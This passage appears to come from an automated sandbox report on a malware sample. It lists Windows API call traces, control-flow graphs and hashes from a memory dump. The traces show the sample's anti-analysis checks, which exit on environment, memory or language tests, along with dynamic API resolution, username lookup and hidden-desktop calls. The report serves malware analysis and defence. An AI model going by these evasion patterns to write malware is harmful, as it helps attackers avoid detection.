                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: faeb61a51652a65a3a78e0810817f92b7d490f623b4338b8c6985e2e270e0378
                          • Instruction ID: 8047b7e1be3a63626930bdbcb9ac8619447712036502f5153e0bf06796b659b3
                          • Opcode Fuzzy Hash: faeb61a51652a65a3a78e0810817f92b7d490f623b4338b8c6985e2e270e0378
                          • Instruction Fuzzy Hash: 91A14CB5A13201AFD774DFA5FC4CA263BB9F7A8641300851BE956D3364DB34A808EB60

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2141 3c1bf0-3c1c0b call 3a2a90 call 3c6390 2146 3c1c0d 2141->2146 2147 3c1c1a-3c1c27 call 3a2930 2141->2147 2149 3c1c10-3c1c18 2146->2149 2151 3c1c29-3c1c2f lstrcpy 2147->2151 2152 3c1c35-3c1c63 2147->2152 2149->2147 2149->2149 2151->2152 2156 3c1c6d-3c1c7b GetSystemInfo 2152->2156 2157 3c1c65-3c1c67 ExitProcess 2152->2157 2158 3c1c7d-3c1c7f ExitProcess 2156->2158 2159 3c1c85-3c1ca0 call 3a1030 call 3a10c0 GetUserDefaultLangID 2156->2159 2164 3c1cb8-3c1cca call 3c2ad0 call 3c3e10 2159->2164 2165 3c1ca2-3c1ca9 2159->2165 2171 3c1ccc-3c1cde call 3c2a40 call 3c3e10 2164->2171 2172 3c1ce7-3c1d06 lstrlen call 3a2930 2164->2172 2165->2164 2166 3c1cb0-3c1cb2 ExitProcess 2165->2166 2171->2172 2185 3c1ce0-3c1ce1 ExitProcess 2171->2185 2177 3c1d08-3c1d0d 2172->2177 2178 3c1d23-3c1d40 lstrlen call 3a2930 2172->2178 2177->2178 2180 3c1d0f-3c1d11 2177->2180 2186 3c1d5a-3c1d7b call 3c2ad0 lstrlen call 3a2930 2178->2186 2187 3c1d42-3c1d44 2178->2187 2180->2178 2183 3c1d13-3c1d1d lstrcpy lstrcat 2180->2183 2183->2178 2193 3c1d7d-3c1d7f 2186->2193 2194 3c1d9a-3c1db4 lstrlen call 3a2930 2186->2194 2187->2186 2188 3c1d46-3c1d54 lstrcpy lstrcat 2187->2188 2188->2186 2193->2194 2195 3c1d81-3c1d85 2193->2195 2199 3c1dce-3c1deb call 3c2a40 lstrlen call 3a2930 2194->2199 2200 3c1db6-3c1db8 2194->2200 2195->2194 2197 3c1d87-3c1d94 lstrcpy lstrcat 2195->2197 2197->2194 2206 3c1ded-3c1def 2199->2206 2207 3c1e0a-3c1e0f 2199->2207 2200->2199 2201 3c1dba-3c1dc8 lstrcpy lstrcat 2200->2201 2201->2199 2206->2207 2210 3c1df1-3c1df5 2206->2210 2208 3c1e16-3c1e22 call 3a2930 2207->2208 2209 3c1e11 call 3a2a20 2207->2209 2215 3c1e24-3c1e26 2208->2215 2216 3c1e30-3c1e66 call 3a2a20 * 5 OpenEventA 2208->2216 2209->2208 2210->2207 2213 3c1df7-3c1e04 lstrcpy lstrcat 2210->2213 2213->2207 2215->2216 2217 3c1e28-3c1e2a lstrcpy 2215->2217 2228 3c1e8c-3c1ea0 CreateEventA call 3c1b20 call 3bffd0 2216->2228 2229 3c1e68-3c1e8a CloseHandle Sleep OpenEventA 2216->2229 2217->2216 2233 3c1ea5-3c1eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                          APIs
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F21508), ref: 003C63E9
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F21628), ref: 003C6402
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F21580), ref: 003C641A
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F215C8), ref: 003C6432
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F293D8), ref: 003C644B
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F166D8), ref: 003C6463
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F16858), ref: 003C647B
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F216B8), ref: 003C6494
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F216D0), ref: 003C64AC
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F216E8), ref: 003C64C4
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F21700), ref: 003C64DD
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F16698), ref: 003C64F5
                            • Part of subcall function 003C6390: GetProcAddress.KERNEL32(77190000,00F215E0), ref: 003C650D
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C1C2F
                          • ExitProcess.KERNEL32 ref: 003C1C67
                          • GetSystemInfo.KERNEL32(?), ref: 003C1C71
                          • ExitProcess.KERNEL32 ref: 003C1C7F
                            • Part of subcall function 003A1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003A1046
                            • Part of subcall function 003A1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 003A104D
                            • Part of subcall function 003A1030: ExitProcess.KERNEL32 ref: 003A1058
                            • Part of subcall function 003A10C0: GlobalMemoryStatusEx.KERNEL32 ref: 003A10EA
                            • Part of subcall function 003A10C0: ExitProcess.KERNEL32 ref: 003A1114
                          • GetUserDefaultLangID.KERNEL32 ref: 003C1C8F
                          • ExitProcess.KERNEL32 ref: 003C1CB2
                          • ExitProcess.KERNEL32 ref: 003C1CE1
                          • lstrlen.KERNEL32(00F29338), ref: 003C1CEE
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C1D15
                          • lstrcat.KERNEL32(00000000,00F29338), ref: 003C1D1D
                          • lstrlen.KERNEL32(003D4B98), ref: 003C1D28
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1D48
                          • lstrcat.KERNEL32(00000000,003D4B98), ref: 003C1D54
                          • lstrlen.KERNEL32(00000000), ref: 003C1D63
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1D89
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003C1D94
                          • lstrlen.KERNEL32(003D4B98), ref: 003C1D9F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1DBC
                          • lstrcat.KERNEL32(00000000,003D4B98), ref: 003C1DC8
                          • lstrlen.KERNEL32(00000000), ref: 003C1DD7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1DF9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003C1E04
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                          • String ID:
                          • API String ID: 3366406952-0
                          • Opcode ID: f158c21188a0a53de87a8f00bee77314500a5b9ad66989579f6f4d1d0dee9489
                          • Instruction ID: 602e34571221f885ef18be9025d903fcbacdd427a83a3630e08f2195b9307993
                          • Opcode Fuzzy Hash: f158c21188a0a53de87a8f00bee77314500a5b9ad66989579f6f4d1d0dee9489
                          • Instruction Fuzzy Hash: F2714031502216ABD732ABB4EC4DF6F7779AF66701F05401AF906DA2A2DF709C05EB60

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2850 3a4a60-3a4afc RtlAllocateHeap 2867 3a4b7a-3a4bbe VirtualProtect 2850->2867 2868 3a4afe-3a4b03 2850->2868 2869 3a4b06-3a4b78 2868->2869 2869->2867
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003A4AA3
                          • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 003A4BB0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-3329630956
                          • Opcode ID: e24b6d1e670a8080c64ecefebb790f25cc03ca99f28539811419a6ff003e7335
                          • Instruction ID: 15e2f5ee5f47226ce7b05c1afecdad1e86d5764ade5de11796763814d0ea7487
                          • Opcode Fuzzy Hash: e24b6d1e670a8080c64ecefebb790f25cc03ca99f28539811419a6ff003e7335
                          • Instruction Fuzzy Hash: 0931091AB8121C779622EBEF6C67F9F6E55DFC5750B010073F5A857380CBB15400CAA2
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 003C2A6F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C2A76
                          • GetUserNameA.ADVAPI32(00000000,00000104), ref: 003C2A8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: a4ced390d653aa6c7d84f64f539c7b57b03a07e0229e1814d50b789b0c057e53
                          • Instruction ID: 71f977891711f2417cf4fae20fd7bfc0861ec3882db8de8278c351543eee5c92
                          • Opcode Fuzzy Hash: a4ced390d653aa6c7d84f64f539c7b57b03a07e0229e1814d50b789b0c057e53
                          • Instruction Fuzzy Hash: FBF0B4B1A41648ABC710DF88DD49F9EBBBCF704B21F000217F915E3280D774190487A1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 3c66e0-3c66e7 634 3c66ed-3c6af9 GetProcAddress * 43 633->634 635 3c6afe-3c6b92 LoadLibraryA * 8 633->635 634->635 636 3c6c08-3c6c0f 635->636 637 3c6b94-3c6c03 GetProcAddress * 5 635->637 638 3c6c15-3c6ccd GetProcAddress * 8 636->638 639 3c6cd2-3c6cd9 636->639 637->636 638->639 640 3c6d4f-3c6d56 639->640 641 3c6cdb-3c6d4a GetProcAddress * 5 639->641 642 3c6d5c-3c6de4 GetProcAddress * 6 640->642 643 3c6de9-3c6df0 640->643 641->640 642->643 644 3c6df6-3c6f0b GetProcAddress * 12 643->644 645 3c6f10-3c6f17 643->645 644->645 646 3c6f8d-3c6f94 645->646 647 3c6f19-3c6f88 GetProcAddress * 5 645->647 648 3c6f96-3c6fbc GetProcAddress * 2 646->648 649 3c6fc1-3c6fc8 646->649 647->646 648->649 650 3c6fca-3c6ff0 GetProcAddress * 2 649->650 651 3c6ff5-3c6ffc 649->651 650->651 652 3c70ed-3c70f4 651->652 653 3c7002-3c70e8 GetProcAddress * 10 651->653 654 3c70f6-3c714d GetProcAddress * 4 652->654 655 3c7152-3c7159 652->655 653->652 654->655 656 3c716e-3c7175 655->656 657 3c715b-3c7169 GetProcAddress 655->657 658 3c7177-3c71ce GetProcAddress * 4 656->658 659 3c71d3 656->659 657->656 658->659
                          APIs
                          • GetProcAddress.KERNEL32(77190000,00F165F8), ref: 003C66F5
                          • GetProcAddress.KERNEL32(77190000,00F16738), ref: 003C670D
                          • GetProcAddress.KERNEL32(77190000,00F29850), ref: 003C6726
                          • GetProcAddress.KERNEL32(77190000,00F297F0), ref: 003C673E
                          • GetProcAddress.KERNEL32(77190000,00F29808), ref: 003C6756
                          • GetProcAddress.KERNEL32(77190000,00F2D258), ref: 003C676F
                          • GetProcAddress.KERNEL32(77190000,00F1A698), ref: 003C6787
                          • GetProcAddress.KERNEL32(77190000,00F2D1C8), ref: 003C679F
                          • GetProcAddress.KERNEL32(77190000,00F2D0C0), ref: 003C67B8
                          • GetProcAddress.KERNEL32(77190000,00F2D2D0), ref: 003C67D0
                          • GetProcAddress.KERNEL32(77190000,00F2D318), ref: 003C67E8
                          • GetProcAddress.KERNEL32(77190000,00F16778), ref: 003C6801
                          • GetProcAddress.KERNEL32(77190000,00F16798), ref: 003C6819
                          • GetProcAddress.KERNEL32(77190000,00F167B8), ref: 003C6831
                          • GetProcAddress.KERNEL32(77190000,00F167D8), ref: 003C684A
                          • GetProcAddress.KERNEL32(77190000,00F2D348), ref: 003C6862
                          • GetProcAddress.KERNEL32(77190000,00F2D168), ref: 003C687A
                          • GetProcAddress.KERNEL32(77190000,00F1A508), ref: 003C6893
                          • GetProcAddress.KERNEL32(77190000,00F167F8), ref: 003C68AB
                          • GetProcAddress.KERNEL32(77190000,00F2D198), ref: 003C68C3
                          • GetProcAddress.KERNEL32(77190000,00F2D228), ref: 003C68DC
                          • GetProcAddress.KERNEL32(77190000,00F2D1E0), ref: 003C68F4
                          • GetProcAddress.KERNEL32(77190000,00F2D1B0), ref: 003C690C
                          • GetProcAddress.KERNEL32(77190000,00F16818), ref: 003C6925
                          • GetProcAddress.KERNEL32(77190000,00F2D120), ref: 003C693D
                          • GetProcAddress.KERNEL32(77190000,00F2D2E8), ref: 003C6955
                          • GetProcAddress.KERNEL32(77190000,00F2D300), ref: 003C696E
                          • GetProcAddress.KERNEL32(77190000,00F2D288), ref: 003C6986
                          • GetProcAddress.KERNEL32(77190000,00F2D138), ref: 003C699E
                          • GetProcAddress.KERNEL32(77190000,00F2D2A0), ref: 003C69B7
                          • GetProcAddress.KERNEL32(77190000,00F2D330), ref: 003C69CF
                          • GetProcAddress.KERNEL32(77190000,00F2D360), ref: 003C69E7
                          • GetProcAddress.KERNEL32(77190000,00F2D078), ref: 003C6A00
                          • GetProcAddress.KERNEL32(77190000,00F1FD40), ref: 003C6A18
                          • GetProcAddress.KERNEL32(77190000,00F2D150), ref: 003C6A30
                          • GetProcAddress.KERNEL32(77190000,00F2D270), ref: 003C6A49
                          • GetProcAddress.KERNEL32(77190000,00F16838), ref: 003C6A61
                          • GetProcAddress.KERNEL32(77190000,00F2D090), ref: 003C6A79
                          • GetProcAddress.KERNEL32(77190000,00F16878), ref: 003C6A92
                          • GetProcAddress.KERNEL32(77190000,00F2D0A8), ref: 003C6AAA
                          • GetProcAddress.KERNEL32(77190000,00F2D0D8), ref: 003C6AC2
                          • GetProcAddress.KERNEL32(77190000,00F16898), ref: 003C6ADB
                          • GetProcAddress.KERNEL32(77190000,00F168B8), ref: 003C6AF3
                          • LoadLibraryA.KERNEL32(00F2D0F0,003C051F), ref: 003C6B05
                          • LoadLibraryA.KERNEL32(00F2D108), ref: 003C6B16
                          • LoadLibraryA.KERNEL32(00F2D1F8), ref: 003C6B28
                          • LoadLibraryA.KERNEL32(00F2D180), ref: 003C6B3A
                          • LoadLibraryA.KERNEL32(00F2D240), ref: 003C6B4B
                          • LoadLibraryA.KERNEL32(00F2D210), ref: 003C6B5D
                          • LoadLibraryA.KERNEL32(00F2D2B8), ref: 003C6B6F
                          • LoadLibraryA.KERNEL32(00F2D618), ref: 003C6B80
                          • GetProcAddress.KERNEL32(77040000,00F162F8), ref: 003C6B9C
                          • GetProcAddress.KERNEL32(77040000,00F2D600), ref: 003C6BB4
                          • GetProcAddress.KERNEL32(77040000,00F29308), ref: 003C6BCD
                          • GetProcAddress.KERNEL32(77040000,00F2D450), ref: 003C6BE5
                          • GetProcAddress.KERNEL32(77040000,00F16438), ref: 003C6BFD
                          • GetProcAddress.KERNEL32(73E30000,00F1A5A8), ref: 003C6C1D
                          • GetProcAddress.KERNEL32(73E30000,00F16398), ref: 003C6C35
                          • GetProcAddress.KERNEL32(73E30000,00F1A6C0), ref: 003C6C4E
                          • GetProcAddress.KERNEL32(73E30000,00F2D3A8), ref: 003C6C66
                          • GetProcAddress.KERNEL32(73E30000,00F2D408), ref: 003C6C7E
                          • GetProcAddress.KERNEL32(73E30000,00F16518), ref: 003C6C97
                          • GetProcAddress.KERNEL32(73E30000,00F16138), ref: 003C6CAF
                          • GetProcAddress.KERNEL32(73E30000,00F2D5B8), ref: 003C6CC7
                          • GetProcAddress.KERNEL32(768D0000,00F16158), ref: 003C6CE3
                          • GetProcAddress.KERNEL32(768D0000,00F161B8), ref: 003C6CFB
                          • GetProcAddress.KERNEL32(768D0000,00F2D5D0), ref: 003C6D14
                          • GetProcAddress.KERNEL32(768D0000,00F2D540), ref: 003C6D2C
                          • GetProcAddress.KERNEL32(768D0000,00F16278), ref: 003C6D44
                          • GetProcAddress.KERNEL32(75790000,00F1A7D8), ref: 003C6D64
                          • GetProcAddress.KERNEL32(75790000,00F1A530), ref: 003C6D7C
                          • GetProcAddress.KERNEL32(75790000,00F2D498), ref: 003C6D95
                          • GetProcAddress.KERNEL32(75790000,00F16198), ref: 003C6DAD
                          • GetProcAddress.KERNEL32(75790000,00F16318), ref: 003C6DC5
                          • GetProcAddress.KERNEL32(75790000,00F1A918), ref: 003C6DDE
                          • GetProcAddress.KERNEL32(75A10000,00F2D4E0), ref: 003C6DFE
                          • GetProcAddress.KERNEL32(75A10000,00F163B8), ref: 003C6E16
                          • GetProcAddress.KERNEL32(75A10000,00F292B8), ref: 003C6E2F
                          • GetProcAddress.KERNEL32(75A10000,00F2D3C0), ref: 003C6E47
                          • GetProcAddress.KERNEL32(75A10000,00F2D5E8), ref: 003C6E5F
                          • GetProcAddress.KERNEL32(75A10000,00F16358), ref: 003C6E78
                          • GetProcAddress.KERNEL32(75A10000,00F16418), ref: 003C6E90
                          • GetProcAddress.KERNEL32(75A10000,00F2D420), ref: 003C6EA8
                          • GetProcAddress.KERNEL32(75A10000,00F2D3D8), ref: 003C6EC1
                          • GetProcAddress.KERNEL32(75A10000,CreateDesktopA), ref: 003C6ED7
                          • GetProcAddress.KERNEL32(75A10000,OpenDesktopA), ref: 003C6EEE
                          • GetProcAddress.KERNEL32(75A10000,CloseDesktop), ref: 003C6F05
                          • GetProcAddress.KERNEL32(76850000,00F161D8), ref: 003C6F21
                          • GetProcAddress.KERNEL32(76850000,00F2D630), ref: 003C6F39
                          • GetProcAddress.KERNEL32(76850000,00F2D4B0), ref: 003C6F52
                          • GetProcAddress.KERNEL32(76850000,00F2D570), ref: 003C6F6A
                          • GetProcAddress.KERNEL32(76850000,00F2D648), ref: 003C6F82
                          • GetProcAddress.KERNEL32(75690000,00F16378), ref: 003C6F9E
                          • GetProcAddress.KERNEL32(75690000,00F16338), ref: 003C6FB6
                          • GetProcAddress.KERNEL32(769C0000,00F163D8), ref: 003C6FD2
                          • GetProcAddress.KERNEL32(769C0000,00F2D660), ref: 003C6FEA
                          • GetProcAddress.KERNEL32(6FB00000,00F161F8), ref: 003C700A
                          • GetProcAddress.KERNEL32(6FB00000,00F16458), ref: 003C7022
                          • GetProcAddress.KERNEL32(6FB00000,00F163F8), ref: 003C703B
                          • GetProcAddress.KERNEL32(6FB00000,00F2D3F0), ref: 003C7053
                          • GetProcAddress.KERNEL32(6FB00000,00F16238), ref: 003C706B
                          • GetProcAddress.KERNEL32(6FB00000,00F16258), ref: 003C7084
                          • GetProcAddress.KERNEL32(6FB00000,00F16298), ref: 003C709C
                          • GetProcAddress.KERNEL32(6FB00000,00F16218), ref: 003C70B4
                          • GetProcAddress.KERNEL32(6FB00000,InternetSetOptionA), ref: 003C70CB
                          • GetProcAddress.KERNEL32(6FB00000,HttpQueryInfoA), ref: 003C70E2
                          • GetProcAddress.KERNEL32(75D90000,00F2D4F8), ref: 003C70FE
                          • GetProcAddress.KERNEL32(75D90000,00F29418), ref: 003C7116
                          • GetProcAddress.KERNEL32(75D90000,00F2D510), ref: 003C712F
                          • GetProcAddress.KERNEL32(75D90000,00F2D378), ref: 003C7147
                          • GetProcAddress.KERNEL32(76470000,00F162D8), ref: 003C7163
                          • GetProcAddress.KERNEL32(6D780000,00F2D390), ref: 003C717F
                          • GetProcAddress.KERNEL32(6D780000,00F16478), ref: 003C7197
                          • GetProcAddress.KERNEL32(6D780000,00F2D438), ref: 003C71B0
                          • GetProcAddress.KERNEL32(6D780000,00F2D558), ref: 003C71C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                          • API String ID: 2238633743-3468015613
                          • Opcode ID: 62580ca970e61cce1710b86d8ce2030603c307042c0a68ac14e414d9afb7e140
                          • Instruction ID: 00f1b9b2d1c239967e5eac8fc1e95838c5f3dc8c7a403184ba807a13b47fa3b4
                          • Opcode Fuzzy Hash: 62580ca970e61cce1710b86d8ce2030603c307042c0a68ac14e414d9afb7e140
                          • Instruction Fuzzy Hash: 18623CB5613201AFD774DF65FC8CA2637BAF7A8201314891BE956D3364DB34A848FB60
                          APIs
                          • lstrlen.KERNEL32(003CCFEC), ref: 003BF1D5
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BF1F1
                          • lstrlen.KERNEL32(003CCFEC), ref: 003BF1FC
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BF215
                          • lstrlen.KERNEL32(003CCFEC), ref: 003BF220
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BF239
                          • lstrcpy.KERNEL32(00000000,003D4FA0), ref: 003BF25E
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BF28C
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BF2C0
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BF2F0
                          • lstrlen.KERNEL32(00F16598), ref: 003BF315
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
